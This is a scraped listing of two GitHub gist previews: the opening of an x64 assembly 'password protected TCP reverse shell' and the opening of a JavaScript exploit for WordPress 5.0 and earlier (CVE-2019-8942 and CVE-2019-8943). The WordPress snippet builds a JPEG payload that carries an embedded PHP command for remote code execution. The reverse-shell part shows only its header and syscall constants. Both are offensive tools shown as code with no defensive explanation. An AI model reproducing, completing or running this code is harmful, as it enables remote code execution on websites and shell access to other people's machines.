alanvivona
/ reverse-tcp-auth-shell.nasm
Last active
January 30, 2020 11:04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; ================================================= | |
| ; Password protected x64 TCP Reverse Shell | |
| ; Author: Alan Vivona | |
| ; ================================================= | |
| global _start | |
| ; Syscall numbers | |
| syscalls.socket equ 0x29 | |
| syscalls.bind equ 0x31 |
FlatL1neAPT
/ wordpress-rce.js
Created
March 3, 2019 07:39
— forked from allyshka/wordpress-rce.js
WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var wpnonce = ''; | |
| var ajaxnonce = ''; | |
| var wp_attached_file = ''; | |
| var imgurl = ''; | |
| var postajaxdata = ''; | |
| var post_id = 0; | |
| var cmd = '<?php phpinfo();/*'; | |
| var cmdlen = cmd.length | |
| var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9'; | |
| var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd); |